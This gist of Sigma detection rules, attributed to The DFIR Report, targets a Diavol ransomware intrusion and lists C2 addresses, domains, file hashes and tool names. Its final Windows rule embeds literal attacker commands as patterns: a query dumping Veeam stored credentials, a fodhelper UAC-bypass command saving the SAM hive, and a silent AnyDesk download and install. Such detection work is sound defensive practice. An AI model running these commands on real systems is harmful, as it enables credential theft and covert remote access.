@0xThiebaut
Last active Dec 12, 2021
action: global
title: Diavol Ransomware
id: e6fedcaa-265a-4ecc-92c9-5368eba2681a
status: experimental
description: See MISP event 8099
author: The DFIR Report
level: medium
tags:
  - Bazar
  - tlp:amber
  - workflow:state="ongoing"
  - misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"
  - misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"
  - misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"
  - misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"
  - misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"
  - misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"
  - misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"
  - misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"
  - misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"
  - misp-galaxy:mitre-attack-pattern="Process Injection - T1055"
  - misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"
  - misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"
  - misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"
  - misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"
  - misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"
  - misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"
  - misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"
  - misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"
  - misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"
  - misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"
  - misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"
---
logsource:
  category: firewall
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
logsource:
  category: proxy
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499479mapping*
    - all of event8099attr499480mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499482mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr499485mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499479mappingDomain:
    - c-uri|contains: gawocag.com
    - cs-referrer|contains: gawocag.com
    - r-dns|contains: gawocag.com
  event8099attr499480mappingDomain:
    - c-uri|contains: hiduwu.com
    - cs-referrer|contains: hiduwu.com
    - r-dns|contains: hiduwu.com
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499482mappingDomain:
    - c-uri|contains: turkcell.info
    - cs-referrer|contains: turkcell.info
    - r-dns|contains: turkcell.info
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  event8099attr499485mappingURI:
    - c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
logsource:
  category: webserver
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499479mapping*
    - all of event8099attr499480mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499482mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr499485mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499479mappingDomain:
    - c-uri|contains: gawocag.com
    - cs-referrer|contains: gawocag.com
    - r-dns|contains: gawocag.com
  event8099attr499480mappingDomain:
    - c-uri|contains: hiduwu.com
    - cs-referrer|contains: hiduwu.com
    - r-dns|contains: hiduwu.com
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499482mappingDomain:
    - c-uri|contains: turkcell.info
    - cs-referrer|contains: turkcell.info
    - r-dns|contains: turkcell.info
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  event8099attr499485mappingURI:
    - c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
logsource:
  product: windows
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr501608mapping*
    - event8099
    - all of event8099attr545630mapping*
    - all of event8099attr545643mapping*
    - all of event8099attr545644mapping*
    - event8099object26050
    - event8099object26051
    - event8099object26052
    - event8099object26053
    - all of event8099object26054attr501549mapping* and event8099object26054
    - all of event8099object26055attr501555mapping* and event8099object26055
    - event8099object26056
    - all of event8099object26057attr501567mapping* and event8099object26057
    - all of event8099object26058attr501573mapping* and event8099object26058
    - all of event8099object26059attr501579mapping* and event8099object26059
    - all of event8099object26062attr501597mapping* and event8099object26062
    - event8099object26063
    - all of event8099object27480attr545636mapping*
    - all of event8099object27486attr545651mapping* and all of event8099object27486attr545652mapping*
  event8099:
    DestinationIp: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    DestinationIp: 108.62.141.87
    DestinationPort: "443"
  event8099attr499478mappingIPDstPort:
    DestinationIp: 23.81.246.32
    DestinationPort: "443"
  event8099attr499481mappingIPDstPort:
    DestinationIp: 206.189.49.239
    DestinationPort: "443"
  event8099attr499483mappingIPDstPort:
    DestinationIp: 159.223.31.75
    DestinationPort: "443"
  event8099attr501608mappingIPDstPort:
    DestinationIp: 192.52.167.210
    DestinationPort: "22"
  event8099attr545630mappingFilename:
    - Image|endswith: sqlcmd.exe
    - ParentImage|endswith: sqlcmd.exe
    - CommandLine|contains: sqlcmd.exe
    - ParentCommandLine|contains: sqlcmd.exe
    - ProcessName: sqlcmd.exe
    - ParentProcessName: sqlcmd.exe
  event8099attr545643mappingFilename:
    - Image|endswith: tfpkuengdlu.dll
    - ParentImage|endswith: tfpkuengdlu.dll
    - CommandLine|contains: tfpkuengdlu.dll
    - ParentCommandLine|contains: tfpkuengdlu.dll
    - ProcessName: tfpkuengdlu.dll
    - ParentProcessName: tfpkuengdlu.dll
  event8099attr545644mappingFilename:
    - Image|endswith: uvvfvnnswte.dll
    - ParentImage|endswith: uvvfvnnswte.dll
    - CommandLine|contains: uvvfvnnswte.dll
    - ParentCommandLine|contains: uvvfvnnswte.dll
    - ProcessName: uvvfvnnswte.dll
    - ParentProcessName: uvvfvnnswte.dll
  event8099object26050:
    Hashes|contains:
      - ae0ecfddce57c8f966c5ce2e448a39ba
      - 93de6401b68303f5acf7745187dbe6e8ade26a01
      - 2a0a114a95f373ac8ce52d2d83f3fb33da987e33db604d7e6431b98b7f006c5b
  event8099object26051:
    Hashes|contains:
      - 4d8af5ba95aa23f7162b7bbf8622d801
      - d5b8c1a219686be5b75e58c560609023b491d9aa
      - e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162
  event8099object26052:
    Hashes|contains:
      - fb88f4d22f14ca09ddeeca5d312f4d9f
      - 734205a694689db504418101b91c9981e3a12deb
      - c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299
  event8099object26053:
    Hashes|contains:
      - 9b02dd2a1a15e94922be3f85129083ac
      - 2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a
      - b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682
  event8099object26054:
    Hashes|contains:
      - 6798ff540f3d077c3cda2f5a4a8559f7
      - 40e8b04603f168b034c322be6c8b0afa5a9e89ac
      - 0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb
  event8099object26054attr501549mappingFilename:
    - Image|endswith: Rubeus.exe
    - ParentImage|endswith: Rubeus.exe
    - CommandLine|contains: Rubeus.exe
    - ParentCommandLine|contains: Rubeus.exe
    - ProcessName: Rubeus.exe
    - ParentProcessName: Rubeus.exe
  event8099object26055:
    Hashes|contains:
      - 69c68c62844966115c13dfee2e7bc58c
      - 7f49ecaebe1c59c09587cee25fb8844c78a78665
      - 5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d
  event8099object26055attr501555mappingFilename:
    - Image|endswith: uvvfvnnswte.dll
    - ParentImage|endswith: uvvfvnnswte.dll
    - CommandLine|contains: uvvfvnnswte.dll
    - ParentCommandLine|contains: uvvfvnnswte.dll
    - ProcessName: uvvfvnnswte.dll
    - ParentProcessName: uvvfvnnswte.dll
  event8099object26056:
    Hashes|contains:
      - 56c552097559ecbafedd5683038ca480
      - dc0699b1d1c5a99b75334b69dafce5fe86bcf6a3
      - 493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54
  event8099object26057:
    Hashes|contains:
      - 1e81900cc66fde050aef4c3149f1a375
      - f334b1b95f315f994c82da572e7acb68df4b17ed
      - 9809bc0bea9bbfe31d47210391b124a724288b061d44dee5edc5e2582e36b271
  event8099object26057attr501567mappingFilename:
    - Image|endswith: fodhelper_reg_hashes.bat
    - ParentImage|endswith: fodhelper_reg_hashes.bat
    - CommandLine|contains: fodhelper_reg_hashes.bat
    - ParentCommandLine|contains: fodhelper_reg_hashes.bat
    - ProcessName: fodhelper_reg_hashes.bat
    - ParentProcessName: fodhelper_reg_hashes.bat
  event8099object26058:
    Hashes|contains:
      - e63eff806ef5a7d04dabad6e59e88e3a
      - 4d7102f088c73eb91213f6950f0d334157557fce
      - 452d7485ae47f431c6c4dc2ce1f021e61cd939b4a3f51b01e15d03dcd4de8ef2
  event8099object26058attr501573mappingFilename:
    - Image|endswith: README_FOR_DECRYPT.txt
    - ParentImage|endswith: README_FOR_DECRYPT.txt
    - CommandLine|contains: README_FOR_DECRYPT.txt
    - ParentCommandLine|contains: README_FOR_DECRYPT.txt
    - ProcessName: README_FOR_DECRYPT.txt
    - ParentProcessName: README_FOR_DECRYPT.txt
  event8099object26059:
    Hashes|contains:
      - e6bef068c93cacdae7f15eded63461da
      - 0390eacb29a580adf9870dbd3412f91d984a3197
      - bc88ae2c3353ee858a0dcdcd087bcd55f3c7eab0c702f7b295d2836565073730
  event8099object26059attr501579mappingFilename:
    - Image|endswith: MSSQLUDPScanner.exe
    - ParentImage|endswith: MSSQLUDPScanner.exe
    - CommandLine|contains: MSSQLUDPScanner.exe
    - ParentCommandLine|contains: MSSQLUDPScanner.exe
    - ProcessName: MSSQLUDPScanner.exe
    - ParentProcessName: MSSQLUDPScanner.exe
  event8099object26062:
    Hashes|contains:
      - 32d6f85c93bad9fa0f3eda1a8e800160
      - 6e7628cd11dc76835e8cc0b2a91dc38101fcdb90
      - 07f4a329f280d2896e1211ea79c73132be3a44e6c88819dea194e582bac18b3d
  event8099object26062attr501597mappingFilename:
    - Image|endswith: veeam1.cs.exe
    - ParentImage|endswith: veeam1.cs.exe
    - CommandLine|contains: veeam1.cs.exe
    - ParentCommandLine|contains: veeam1.cs.exe
    - ProcessName: veeam1.cs.exe
    - ParentProcessName: veeam1.cs.exe
  event8099object26063:
    Hashes|contains:
      - e5f3cea83f3aa86fc4766c8061a8f3ec
      - 77b238f5755940fbdc85a8f88a841e73cbe240e5
      - a05888cf9ee72435f502a4cd41e0733fb30b37192db32fb0c33675c2b7acccde
  event8099object27480attr545636mappingFilename:
    - Image|endswith: fodhelper_reg_hashes.bat
    - ParentImage|endswith: fodhelper_reg_hashes.bat
    - CommandLine|contains: fodhelper_reg_hashes.bat
    - ParentCommandLine|contains: fodhelper_reg_hashes.bat
    - ProcessName: fodhelper_reg_hashes.bat
    - ParentProcessName: fodhelper_reg_hashes.bat
  event8099object27486attr545651mappingFilename:
    - Image|endswith: cmd.exe
    - ParentImage|endswith: cmd.exe
    - CommandLine|contains: cmd.exe
    - ParentCommandLine|contains: cmd.exe
    - ProcessName: cmd.exe
    - ParentProcessName: cmd.exe
  event8099object27486attr545652mappingFilename:
    - Image|endswith: more.exe
    - ParentImage|endswith: more.exe
    - CommandLine|contains: more.exe
    - ParentCommandLine|contains: more.exe
    - ProcessName: more.exe
    - ParentProcessName: more.exe
---
action: global
title: Diavol Ransomware
id: e6fedcaa-265a-4ecc-92c9-5368eba2681a
status: experimental
description: See MISP event 8099
author: The DFIR Report
level: medium
tags:
  - Bazar
  - tlp:amber
  - workflow:state="ongoing"
  - misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002"
  - misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"
  - misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"
  - misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"
  - misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"
  - misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"
  - misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"
  - misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"
  - misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"
  - misp-galaxy:mitre-attack-pattern="Process Injection - T1055"
  - misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"
  - misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"
  - misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"
  - misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"
  - misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"
  - misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"
  - misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"
  - misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"
  - misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"
  - misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"
  - misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"
---
logsource:
  category: firewall
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
logsource:
  category: proxy
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499479mapping*
    - all of event8099attr499480mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499482mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr499485mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499479mappingDomain:
    - c-uri|contains: gawocag.com
    - cs-referrer|contains: gawocag.com
    - r-dns|contains: gawocag.com
  event8099attr499480mappingDomain:
    - c-uri|contains: hiduwu.com
    - cs-referrer|contains: hiduwu.com
    - r-dns|contains: hiduwu.com
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499482mappingDomain:
    - c-uri|contains: turkcell.info
    - cs-referrer|contains: turkcell.info
    - r-dns|contains: turkcell.info
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  event8099attr499485mappingURI:
    - c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
logsource:
  category: webserver
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499479mapping*
    - all of event8099attr499480mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499482mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr499485mapping*
    - all of event8099attr501608mapping*
    - event8099
  event8099:
    dst_ip: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    dst_ip: 108.62.141.87
    dst_port: "443"
  event8099attr499478mappingIPDstPort:
    dst_ip: 23.81.246.32
    dst_port: "443"
  event8099attr499479mappingDomain:
    - c-uri|contains: gawocag.com
    - cs-referrer|contains: gawocag.com
    - r-dns|contains: gawocag.com
  event8099attr499480mappingDomain:
    - c-uri|contains: hiduwu.com
    - cs-referrer|contains: hiduwu.com
    - r-dns|contains: hiduwu.com
  event8099attr499481mappingIPDstPort:
    dst_ip: 206.189.49.239
    dst_port: "443"
  event8099attr499482mappingDomain:
    - c-uri|contains: turkcell.info
    - cs-referrer|contains: turkcell.info
    - r-dns|contains: turkcell.info
  event8099attr499483mappingIPDstPort:
    dst_ip: 159.223.31.75
    dst_port: "443"
  event8099attr499485mappingURI:
    - c-uri: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - cs-referrer: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
    - r-dns: https://onedrive.live.com/download?cid=0094E8452D7CDD65&resid=94E8452D7CDD65%21135&authkey=AEN3yDYOia1YdKM
  event8099attr501608mappingIPDstPort:
    dst_ip: 192.52.167.210
    dst_port: "22"
---
logsource:
  product: windows
detection:
  condition:
    - all of event8099attr499477mapping*
    - all of event8099attr499478mapping*
    - all of event8099attr499481mapping*
    - all of event8099attr499483mapping*
    - all of event8099attr501608mapping*
    - event8099
    - all of event8099attr545630mapping*
    - all of event8099attr545643mapping*
    - all of event8099attr545644mapping*
    - event8099object26050
    - event8099object26051
    - event8099object26052
    - event8099object26053
    - all of event8099object26054attr501549mapping* and event8099object26054
    - all of event8099object26055attr501555mapping* and event8099object26055
    - event8099object26056
    - all of event8099object26057attr501567mapping* and event8099object26057
    - all of event8099object26058attr501573mapping* and event8099object26058
    - all of event8099object26059attr501579mapping* and event8099object26059
    - all of event8099object26062attr501597mapping* and event8099object26062
    - event8099object26063
    - event8099object27478
    - event8099object27479
    - all of event8099object27480attr545636mapping*
    - event8099object27481
    - event8099object27482
    - event8099object27483
    - event8099object27484
    - event8099object27485
    - event8099object27486
  event8099:
    DestinationIp: 23.152.0.22
  event8099attr499477mappingIPDstPort:
    DestinationIp: 108.62.141.87
    DestinationPort: "443"
  event8099attr499478mappingIPDstPort:
    DestinationIp: 23.81.246.32
    DestinationPort: "443"
  event8099attr499481mappingIPDstPort:
    DestinationIp: 206.189.49.239
    DestinationPort: "443"
  event8099attr499483mappingIPDstPort:
    DestinationIp: 159.223.31.75
    DestinationPort: "443"
  event8099attr501608mappingIPDstPort:
    DestinationIp: 192.52.167.210
    DestinationPort: "22"
  event8099attr545630mappingFilename:
    - Image|endswith: sqlcmd.exe
    - ParentImage|endswith: sqlcmd.exe
    - CommandLine|contains: sqlcmd.exe
    - ParentCommandLine|contains: sqlcmd.exe
    - ProcessName: sqlcmd.exe
    - ParentProcessName: sqlcmd.exe
  event8099attr545643mappingFilename:
    - Image|endswith: tfpkuengdlu.dll
    - ParentImage|endswith: tfpkuengdlu.dll
    - CommandLine|contains: tfpkuengdlu.dll
    - ParentCommandLine|contains: tfpkuengdlu.dll
    - ProcessName: tfpkuengdlu.dll
    - ParentProcessName: tfpkuengdlu.dll
  event8099attr545644mappingFilename:
    - Image|endswith: uvvfvnnswte.dll
    - ParentImage|endswith: uvvfvnnswte.dll
    - CommandLine|contains: uvvfvnnswte.dll
    - ParentCommandLine|contains: uvvfvnnswte.dll
    - ProcessName: uvvfvnnswte.dll
    - ParentProcessName: uvvfvnnswte.dll
  event8099object26050:
    Hashes|contains:
      - ae0ecfddce57c8f966c5ce2e448a39ba
      - 93de6401b68303f5acf7745187dbe6e8ade26a01
      - 2a0a114a95f373ac8ce52d2d83f3fb33da987e33db604d7e6431b98b7f006c5b
  event8099object26051:
    Hashes|contains:
      - 4d8af5ba95aa23f7162b7bbf8622d801
      - d5b8c1a219686be5b75e58c560609023b491d9aa
      - e87f9f378590b95de1b1ef2aaab84e1d00f210fd6aaf5025d815f33096c9d162
  event8099object26052:
    Hashes|contains:
      - fb88f4d22f14ca09ddeeca5d312f4d9f
      - 734205a694689db504418101b91c9981e3a12deb
      - c17e71c7ae15fdb02a4e22df4f50fb44215211755effd6e3fc56e7f3e586b299
  event8099object26053:
    Hashes|contains:
      - 9b02dd2a1a15e94922be3f85129083ac
      - 2cb6ff75b38a3f24f3b60a2742b6f4d6027f0f2a
      - b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682
  event8099object26054:
    Hashes|contains:
      - 6798ff540f3d077c3cda2f5a4a8559f7
      - 40e8b04603f168b034c322be6c8b0afa5a9e89ac
      - 0e09068581f6ed53d15d34fff9940dfc7ad224e3ce38ac8d1ca1057aee3e3feb
  event8099object26054attr501549mappingFilename:
    - Image|endswith: Rubeus.exe
    - ProcessName|contains: Rubeus.exe
  event8099object26055:
    Hashes|contains:
      - 69c68c62844966115c13dfee2e7bc58c
      - 7f49ecaebe1c59c09587cee25fb8844c78a78665
      - 5551fb5702220dfc05e0811b7c91e149c21ec01e8ca210d1602e32dece1e464d
  event8099object26055attr501555mappingFilename:
    - Image|endswith: uvvfvnnswte.dll
    - ProcessName|contains: uvvfvnnswte.dll
  event8099object26056:
    Hashes|contains:
      - 56c552097559ecbafedd5683038ca480
      - dc0699b1d1c5a99b75334b69dafce5fe86bcf6a3
      - 493a1fbe833c419b37bb345f6f193517d5d9fd2577f09cc74b48b49d7d732a54
  event8099object26057:
    Hashes|contains:
      - 1e81900cc66fde050aef4c3149f1a375
      - f334b1b95f315f994c82da572e7acb68df4b17ed
      - 9809bc0bea9bbfe31d47210391b124a724288b061d44dee5edc5e2582e36b271
  event8099object26057attr501567mappingFilename:
    - Image|endswith: fodhelper_reg_hashes.bat
    - ProcessName|contains: fodhelper_reg_hashes.bat
  event8099object26058:
    Hashes|contains:
      - e63eff806ef5a7d04dabad6e59e88e3a
      - 4d7102f088c73eb91213f6950f0d334157557fce
      - 452d7485ae47f431c6c4dc2ce1f021e61cd939b4a3f51b01e15d03dcd4de8ef2
  event8099object26058attr501573mappingFilename:
    - Image|endswith: README_FOR_DECRYPT.txt
    - ProcessName|contains: README_FOR_DECRYPT.txt
  event8099object26059:
    Hashes|contains:
      - e6bef068c93cacdae7f15eded63461da
      - 0390eacb29a580adf9870dbd3412f91d984a3197
      - bc88ae2c3353ee858a0dcdcd087bcd55f3c7eab0c702f7b295d2836565073730
  event8099object26059attr501579mappingFilename:
    - Image|endswith: MSSQLUDPScanner.exe
    - ProcessName|contains: MSSQLUDPScanner.exe
  event8099object26062:
    Hashes|contains:
      - 32d6f85c93bad9fa0f3eda1a8e800160
      - 6e7628cd11dc76835e8cc0b2a91dc38101fcdb90
      - 07f4a329f280d2896e1211ea79c73132be3a44e6c88819dea194e582bac18b3d
  event8099object26062attr501597mappingFilename:
    - Image|endswith: veeam1.cs.exe
    - ProcessName|contains: veeam1.cs.exe
  event8099object26063:
    Hashes|contains:
      - e5f3cea83f3aa86fc4766c8061a8f3ec
      - 77b238f5755940fbdc85a8f88a841e73cbe240e5
      - a05888cf9ee72435f502a4cd41e0733fb30b37192db32fb0c33675c2b7acccde
  event8099object27478:
    CommandLine|contains: sqlcmd.exe -S localhost,51341 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
  event8099object27479:
    CommandLine|contains: csc.exe veeam1.cs.txt
  event8099object27480attr545636mappingFilename:
    - Image|endswith: fodhelper_reg_hashes.bat
    - ProcessName|contains: fodhelper_reg_hashes.bat
  event8099object27481:
    CommandLine|contains: reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "reg.exe save hklm\sam %ALLUSERSPROFILE%\sam.save" /f
  event8099object27482:
    CommandLine|contains: (new-object System.Net.WebClient).DownloadFile("http://download.anydesk.com/AnyDesk.exe", "%ALLUSERSPROFILE%\AnyDesk.exe")
  event8099object27483:
    CommandLine|contains: cmd.exe /c %ALLUSERSPROFILE%\AnyDesk.exe --install %ALLUSERSPROFILE%\AnyDesk --start-with-win --silent
  event8099object27484:
    ParentProcessName: msedge.exe
    ProcessName: rundll32.exe
  event8099object27485:
    CommandLine|contains: sqlcmd -E -S localhost -Q "BACKUP DATABASE master TO DISK='%ALLUSERSPROFILE%\sql\master.bak'"
  event8099object27486:
    CommandLine|contains: edge-cookies.json
    Image|endswith: more.exe
    ParentImage|endswith: cmd.exe